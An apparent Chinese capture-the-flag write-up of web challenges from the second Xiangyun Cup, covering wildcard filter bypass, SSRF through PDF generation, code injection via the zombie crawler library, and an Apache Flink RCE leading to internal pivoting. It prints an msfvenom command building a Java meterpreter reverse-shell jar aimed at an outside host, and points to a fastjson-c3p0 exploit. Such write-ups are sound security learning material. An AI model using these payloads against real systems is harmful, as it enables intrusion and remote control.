<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083410111.png" alt="image-20211102083410111"></p>
<p>星号用通配符?绕过</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083431247.png" alt="image-20211102083431247"></p>
<p>读取flag：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083500006.png" alt="image-20211102083500006"></p>
<h3 id="SECRETS-OF-ADMIN"><a href="#SECRETS-OF-ADMIN" class="headerlink" title="SECRETS_OF_ADMIN"></a>SECRETS_OF_ADMIN</h3><p>下载附件打开databases.ts存在账号密码，直接拿去登录</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083611993.png" alt="image-20211102083611993"></p>
<p>登录之后是一个通过内容生成PDF的逻辑，以往经验，通过link、img、iframe可以将内容带出来，或者实现SSRF</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083715037.png" alt="image-20211102083715037"></p>
<p>看到index.ts文件，虽然对传入内容进行了过滤，但是这里可以直接使用数组进行绕过：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083752274.png" alt="image-20211102083752274"></p>
<p>但是生成的PDF用了UUID，我们无法得到文件名进行下载，但是在下面一个路由上可以写文件，可以将另外一个文件写入logs，同时他就卡死只能是127.0.0.1，直接说明我们需要通过PDF进行SSRF，执行这个路由将flag写入指定文件内：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083929705.png" alt="image-20211102083929705"></p>
<p>构造payload：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083947148.png" alt="image-20211102083947148"></p>
<p>下载flag文件：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102084008545.png" alt="image-20211102084008545"></p>
<h3 id="CRAWLER-Z"><a href="#CRAWLER-Z" class="headerlink" title="CRAWLER_Z"></a>CRAWLER_Z</h3><p>题目提供源码，在bucket处存在明显的SSRF</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102084100578.png" alt="image-20211102084100578">但是怎么绕过正则就成了问题。后面发现verify会将personalBucket写入Bucket，而personalBucket在profile中是可控的。</p>
<p>我们可以将profile提交合法的personalBucket，然后获取到token通过verify将personalBucket写入指定的token中，然后通过Bucket来爬取页面。</p>
<ul>
<li>先提交合法的personalBucket</li>
</ul>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102084359531.png" alt="image-20211102084359531"></p>
<ul>
<li>通过verify来覆盖Bucket</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://eci-2ze44hd5fno8qj0427fv.cloudeci1.ichunqiu.com:8888/user/verify?</span><br><span class="line">token=82813f39503f42eba99b711c27c5f809018a4f6d0fe40bb66a7b306ec</span><br><span class="line">6791fa7</span><br></pre></td></tr></table></figure>

<ul>
<li>Bucket获取内容</li>
</ul>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102084451120.png" alt="image-20211102084451120"></p>
<ul>
<li><p>通过302跳转，可以发现能够读取内容，但是flag无法读取。一读取flag靶机就会崩溃，应该是开了文件保护。<img src="http://cr_7.gitee.io/git-hub-image/image-20211102084602385.png" alt="image-20211102084602385"></p>
</li>
<li><p>后面留意到题目名称叫Crawler，那么肯定和这个类有关。追踪这个类发现他是二次封装的zombie库。google发现zombie存在代码注入，在加载js时候会存在任意代码执行。</p>
</li>
</ul>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102084802893.png" alt="image-20211102084802893"></p>
<p>于是远程写一个代码</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102084819056.png" alt="image-20211102084819056"></p>
<p>再通过bucket爬取：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102084837252.png" alt="image-20211102084837252"></p>
<p>读取flag：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102084847631.png" alt="image-20211102084847631"></p>
<h3 id="层层穿透"><a href="#层层穿透" class="headerlink" title="层层穿透"></a>层层穿透</h3><p>第一层是一个apache flink rce的day洞：</p>
<p>msfvenom -p java/meterpreter/reverse_tcp LHOST=vps LPORT=port -f jar &gt; rce.jar</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102084946745.png" alt="image-20211102084946745"></p>
<p>内网拿fscan扫一下得到：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.10.1.11:8080</span><br></pre></td></tr></table></figure>

<p>穿透出来发现是给的附件的jar应用，发现lib下有c3p0库，用注释填充一下后打回显：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http</span><br><span class="line">s://github.com/depycode/fastjson-c3p0</span><br></pre></td></tr></table></figure>

<p>根目录有个flag，读取即可：<br><img src="http://cr_7.gitee.io/git-hub-image/image-20211102085136584.png" alt="image-20211102085136584"></p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="http://example.com/2021/11/15/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A5%A5%E4%BA%91%E6%9D%AF/" title="第二届祥云杯" target="_blank" rel="external">http://example.com/2021/11/15/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A5%A5%E4%BA%91%E6%9D%AF/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/cofess" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/cofess" target="_blank"><span class="text-dark">chickenmushroom</span><small class="ml-1x">Web</small></a></h3>
        <div>平平无奇的小红帽。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2021/11/15/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D(ms17-010)%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" title="永恒之蓝(ms17-010)漏洞复现"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;Newer</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2021/11/15/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E4%B9%8B%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/" title="逻辑漏洞之支付逻辑漏洞"><span>Older&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
    <li class="toggle-toc">
      <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false" title="Catalogue" role="button">
        <span>[&nbsp;</span><span>Catalogue</span>
        <i class="text-collapsed icon icon-anchor"></i>
        <i class="text-in icon icon-close"></i>
        <span>]</span>
      </a>
    </li>
    
  </ul>
  
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="/null" target="_blank" title="Github" ><i class="icon icon-github"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Weibo" ><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Twitter" ><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Behance" ><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" ><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: '',
    appKey: '',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>